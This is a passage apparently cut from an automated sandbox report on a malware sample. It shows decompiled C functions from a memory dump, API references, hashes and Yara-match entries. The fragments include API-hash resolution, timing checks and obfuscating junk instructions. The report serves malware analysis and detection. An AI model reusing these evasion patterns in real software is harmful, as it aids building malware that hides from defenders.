				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041839A(void* __eax, void* __ecx, void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t20;
				void* _t29;

				asm("cld");
				asm("sbb eax, 0x8bec8b55");
				_t16 = _a4;
				_t6 = _t16 + 0xc60; // 0xca0
				E00418DC0(_t29, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t20 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t20;
			}

0x0041839a
0x0041839f
0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5aaf453c4f4a24bf3881a8efb48051f323febd31cc0ef31836b10f5f9fb3e8ad
Instruction ID: 1f52d03ee59f11a315f7ee3a505cb27799906dd0e027da898106c422454db46c
Opcode Fuzzy Hash: 5aaf453c4f4a24bf3881a8efb48051f323febd31cc0ef31836b10f5f9fb3e8ad
Instruction Fuzzy Hash: F9F08CB11041896BCB04DFA8DC80CABB7A8AF88210B148A5DF98C97203C634D815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01A299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A299AA

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a4570e9887b9855c826bfad9c279a036e919e6a34f7c494159ec452ae0f32865
Instruction ID: 7f356f82eb9c20c9587131c48b873f537286c775374c6092dcdbbe81a4ae3bb1
Opcode Fuzzy Hash: a4570e9887b9855c826bfad9c279a036e919e6a34f7c494159ec452ae0f32865
Instruction Fuzzy Hash: 309002A135100482D10061A94414B160005E7E1342F91C015F1054554DC659CC627166

Uniqueness

Uniqueness Score: -1.00%

Function 01A295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A295DA

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 536e48ef1125d6f7ef43abe0c1090cfea172ab33bb31270a2c1cbca6dee59b7e
Instruction ID: 4dfa56612b8bb708287e5c13da655f73e4c90d043323f531fece8d988fa9d1b8
Opcode Fuzzy Hash: 536e48ef1125d6f7ef43abe0c1090cfea172ab33bb31270a2c1cbca6dee59b7e
Instruction Fuzzy Hash: AC9002A121200043410571A94414726400AA7E0242B91C021F1004590DC56588A17165

Uniqueness

Uniqueness Score: -1.00%

Function 01A29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2991A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1dbbac7d37f09afb308fc394ec723725ea2e582d321fadc50e208e46a035c1e8
Instruction ID: cadb0b788d08355fb0e91ade7a5e772126a79a20f935a5be1a8954e54a390f4e
Opcode Fuzzy Hash: 1dbbac7d37f09afb308fc394ec723725ea2e582d321fadc50e208e46a035c1e8
Instruction Fuzzy Hash: D99002B121100442D14071A944047560005A7D0342F91C011B5054554EC6998DE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 01A29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2954A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59144c27c13eda854a2c4837eae0534f4f58bd8a3426d3c779b60927b032a37a
Instruction ID: c2d68d3fb356c1609b0bd4a8885fff107023c383297d271cfdb05da489b803b5
Opcode Fuzzy Hash: 59144c27c13eda854a2c4837eae0534f4f58bd8a3426d3c779b60927b032a37a
Instruction Fuzzy Hash: 4E900265221000430105A5A907046170046A7D5392391C021F1005550CD66188716161

Uniqueness

Uniqueness Score: -1.00%

Function 01A298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A298FA

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a90772811315132f34c19c6a3d8085179a19f26ccd2ec9d391ab20ee10da99e
Instruction ID: 6965d5607b22f0dc1236188d89a97f72032125dbd9e274f0aeb8bf3c63ba1f64
Opcode Fuzzy Hash: 2a90772811315132f34c19c6a3d8085179a19f26ccd2ec9d391ab20ee10da99e
Instruction Fuzzy Hash: D890026161100542D10171A94404726000AA7D0282FD1C022B1014555ECA6589A2B171

Uniqueness

Uniqueness Score: -1.00%

Function 01A29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2986A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a18da65534cdaa79340c474b76ecd3c641fdb4fe209e52af0c39db42ac768214
Instruction ID: 58675ba84e87b6642d09701dfa02f6f1845bdbf36d372c557cabc63ad0e73435
Opcode Fuzzy Hash: a18da65534cdaa79340c474b76ecd3c641fdb4fe209e52af0c39db42ac768214
Instruction Fuzzy Hash: 5590027121100453D11161A945047170009A7D0282FD1C412B0414558DD6968962B161

Uniqueness

Uniqueness Score: -1.00%

Function 01A29840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2984A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b9ca566f1f6c106bfc6e3d34e13bac5b03d0269714c686eca282b57b80400895
Instruction ID: 7c9d302e7bd20cf12ffc67446b1a3666a383651954b30373f6a3dfd031b16f24
Opcode Fuzzy Hash: b9ca566f1f6c106bfc6e3d34e13bac5b03d0269714c686eca282b57b80400895
Instruction Fuzzy Hash: A9900261252041925545B1A944046174006B7E02827D1C012B1404950CC5669866E661

Uniqueness

Uniqueness Score: -1.00%

Function 01A297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A297AA

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 56c5495b80330fb4ef805e17a1768683087fa12e381f288728a0106784a1e19e
Instruction ID: 5f55ea3de0eff13cbfebd494870ad89e75ddb959c98fb927f458a1ff8148e064
Opcode Fuzzy Hash: 56c5495b80330fb4ef805e17a1768683087fa12e381f288728a0106784a1e19e
Instruction Fuzzy Hash: 0A90026131100043D14071A954187164005F7E1342F91D011F0404554CD95588666262

Uniqueness

Uniqueness Score: -1.00%

Function 01A29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2978A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a17bbf074f7269c6fcee2f817c1641610a3360dca449985bdd6ff866fb0079e
Instruction ID: 0f3b6ddaa862f396a0485923ff24f594aa8fb83484bd004747bf9e1c0ad10ddb
Opcode Fuzzy Hash: 4a17bbf074f7269c6fcee2f817c1641610a3360dca449985bdd6ff866fb0079e
Instruction Fuzzy Hash: F690026922300042D18071A9540871A0005A7D1243FD1D415B0005558CC95588796361

Uniqueness

Uniqueness Score: -1.00%

Function 01A29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A29FEA

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd4803680df4cf694e1f84def9ec2c3c9ca1177753650f3f5d0244017da9b8e4
Instruction ID: 3473d4a4f52243a8c91cf477c764752e613f90e91b7b5c6138cf9e26df316856
Opcode Fuzzy Hash: dd4803680df4cf694e1f84def9ec2c3c9ca1177753650f3f5d0244017da9b8e4
Instruction Fuzzy Hash: 1A90027132114442D11061A984047160005A7D1242F91C411B0814558DC6D588A17162

Uniqueness

Uniqueness Score: -1.00%

Function 01A29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2971A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a52a473c02b80c2dec456dbf530f0647be78c5cf8469deed72be37229621223
Instruction ID: 6234b1bedc75ce3fd91c227089487052f7bf7561580e19a64aa19243fe8b8ac0
Opcode Fuzzy Hash: 3a52a473c02b80c2dec456dbf530f0647be78c5cf8469deed72be37229621223
Instruction Fuzzy Hash: DB90027121100442D10065E954087560005A7E0342F91D011B5014555EC6A588A17171

Uniqueness

Uniqueness Score: -1.00%

Function 01A296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A296EA

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 209bd875fced2c6d32f9e3a51288333c26cdfd3ac3e24ba00ae0dcecdcc53eda
Instruction ID: ca5f84a0f261eabe07debf5886cf0e707827b0b78a8ddeb76e243634d644f59a
Opcode Fuzzy Hash: 209bd875fced2c6d32f9e3a51288333c26cdfd3ac3e24ba00ae0dcecdcc53eda
Instruction Fuzzy Hash: 6B90027121108842D11061A9840475A0005A7D0342F95C411B4414658DC6D588A17161

Uniqueness

Uniqueness Score: -1.00%

Function 01A29A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A29A2A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45777aea2a7bb6aa64c514c6ba10ed35b66433b04c1eaf0d8d1fc4f17e721454
Instruction ID: 23806269bf9da7c301f6e6bca683165432f2d5f81cdca7d3085024884782939d
Opcode Fuzzy Hash: 45777aea2a7bb6aa64c514c6ba10ed35b66433b04c1eaf0d8d1fc4f17e721454
Instruction Fuzzy Hash: 2490026161100082414071B98844A164005BBE1252791C121B0988550DC599887566A5

Uniqueness

Uniqueness Score: -1.00%

Function 01A29A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A29A0A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c13729503674d026b2b6e54baf16237b7c86ce68e0c339904f294e1664039c8
Instruction ID: 2b9a270e7a7d2cd7769edaf9bea954e749dede9f29a6c6bde5e9aac4d87982d2
Opcode Fuzzy Hash: 3c13729503674d026b2b6e54baf16237b7c86ce68e0c339904f294e1664039c8
Instruction Fuzzy Hash: 3690027121140442D10061A9481471B0005A7D0343F91C011B1154555DC665886175B1

Uniqueness

Uniqueness Score: -1.00%

Function 01A29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A2966A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5281846bc87fe920e5c4e23237d8410310fc9d0ec18c00527f5769112c781a3
Instruction ID: ce8e13fdd51232104d954b476227eb0526690d321ef76ad717d516864bcba467
Opcode Fuzzy Hash: b5281846bc87fe920e5c4e23237d8410310fc9d0ec18c00527f5769112c781a3
Instruction Fuzzy Hash: C490027121100842D18071A9440475A0005A7D1342FD1C015B0015654DCA558A6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 01A29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A29A5A

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbe22a5219571da61b281f5f85c71c58a28f2a9f4eea102e2cea4ab551cb631a
Instruction ID: 8b3df8bb5d6b5566fc73f74130d65a728f6978a364ff694094247fd8bb451ea8
Opcode Fuzzy Hash: dbe22a5219571da61b281f5f85c71c58a28f2a9f4eea102e2cea4ab551cb631a
Instruction Fuzzy Hash: 1890026122180082D20065B94C14B170005A7D0343F91C115B0144554CC95588716561

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004088B0(void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t51;
				intOrPtr _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t53 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(__edx, _t53,  &_v24); // executed
				_t55 = _t54 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t56 = _t55 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						_push( &_v804);
						_push( &_v284);
						E0041A340();
						_t57 = _t56 + 0x10;
						_t51 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t53, _t51),  &_v284);
							_t57 = _t57 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t51 = _t51 + 1;
							if(_t51 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t53 + 0x14; // 0xffffe1a5
						 *(_t53 + 0x474) =  *(_t53 + 0x474) ^  *_t9;
						_t39 = 1;
						L9:
						_t33 = E00407040( &_v24,  &_v840);
						_t56 = _t57 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t53,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t53 + 0x55c)) =  *((intOrPtr*)(_t53 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t53 + 0x31)) =  *((intOrPtr*)(_t53 + 0x31)) + _t39;
					_t20 = _t53 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t53 + 0x32)) =  *((intOrPtr*)(_t53 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088bb
0x004088c3
0x004088c5
0x004088ca
0x004088cf
0x004088e2
0x004088e7
0x004088f0
0x004088fc
0x00408907
0x0040890e
0x0040890f
0x00408914
0x00408917
0x00408920
0x00408932
0x00408937
0x0040893c
0x00000000
0x00000000
0x0040893e
0x00408942
0x00000000
0x00000000
0x00408944
0x00000000
0x00408942
0x00408946
0x00408949
0x0040894f
0x00408951
0x0040895c
0x00408961
0x00408964
0x00408971
0x0040897c
0x0040897e
0x00408984
0x00408988
0x0040898b
0x0040898b
0x00408992
0x00408995
0x0040899a
0x004089a7
0x004088d6
0x004088d6
0x004088d6

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407207, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00407207(void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, long _a12) {
				char _v64;
				void* _t14;
				int _t15;
				void* _t26;
				long _t30;
				int _t35;
				void* _t38;

				_push(cs);
				if(__eflags <= 0) {
					_push(0);
					_v64 = 0;
					E00419D20();
					E0041A900( &_v64, 3);
					_t14 = E00409B20(__eflags, _a8 + 0x1c,  &_v64); // executed
					_t15 = E00413E30(_a8 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
					_t35 = _t15;
					__eflags = _t35;
					if(_t35 != 0) {
						_t30 = _a12;
						_t15 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
						__eflags = _t15;
						if(__eflags == 0) {
							_t15 =  *_t35(_t30, 0x8003, _t38 + (E00409280(__eflags, 1, 8) & 0x000000ff) - 0x40, _t15);
						}
					}
					return _t15;
				} else {
					_push(cs);
					_push(_t38);
					_t26 = E004195D0(__ecx);
					if(_t26 == 0 || _t26 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a4 + _t26;
					}
				}
			}

0x00407207
0x00407208
0x0040726c
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072a8
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x004072dd
0x004072e2
0x0040720a
0x0040720a
0x00407210
0x00407218
0x0040721c
0x0040722f
0x00407232
0x00407226
0x0040722e
0x0040722e
0x0040721c

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Strings

3333, xrefs: 0040721E

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: ac62c4e7e33020e6839715a6eab1f5b830ae84501ed1738da77dfb86b332765f
Instruction ID: 84ad22480b2e7ef3eb825e852dbec8ca99ce36b436caaa074a27a0c8dd550c5c
Opcode Fuzzy Hash: ac62c4e7e33020e6839715a6eab1f5b830ae84501ed1738da77dfb86b332765f
Instruction Fuzzy Hash: 0A110C31A402187ADB2466949C43FFF77685F40724F09406EFE04FB2C1D6B8BD0142EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418502, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00418502(void* __eflags) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t10;
				void* _t13;
				void* _t19;
				void* _t23;

				if(__eflags >= 0) {
					asm("aad 0xc8");
					asm("cdq");
					asm("repe inc esi");
					asm("fldenv [edi-0x74aa25e5]");
					_push(__ebp);
					__ebp = __esp;
					__esi =  *((intOrPtr*)(__ebp + 8)) + 0xc7c;
					ExitProcess( *(__ebp + 0xc));
				}
				E00418DC0(_t19, _t10, _t10 + 0xc70,  *((intOrPtr*)(_t10 + 0x10)), 0, 0x34);
				_t13 = RtlAllocateHeap( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
				return _t13;
			}

0x00418504
0x00418506
0x00418508
0x0041850a
0x0041850c
0x00418510
0x00418511
0x00418522
0x00418538
0x00418538
0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateExitHeapProcess
String ID:
API String ID: 1054155344-0
Opcode ID: 6d7e37e7a3254eae13b748bb76cf8bc55a70cf35ba735eeb998bd21add383dca
Instruction ID: 18685c51227e79c17c3f47a25120ce3df23654b9f19f234554250908c2d3413f
Opcode Fuzzy Hash: 6d7e37e7a3254eae13b748bb76cf8bc55a70cf35ba735eeb998bd21add383dca
Instruction Fuzzy Hash: BFF081B66002106BD724DF65DC85FE77759AF99350F11455DFA086B281CA31E910CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_push(0x3f);
				_push(0);
				_push( &_v67);
				_v68 = 0;
				E00419D20();
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x00407267
0x0040726c
0x0040726e
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

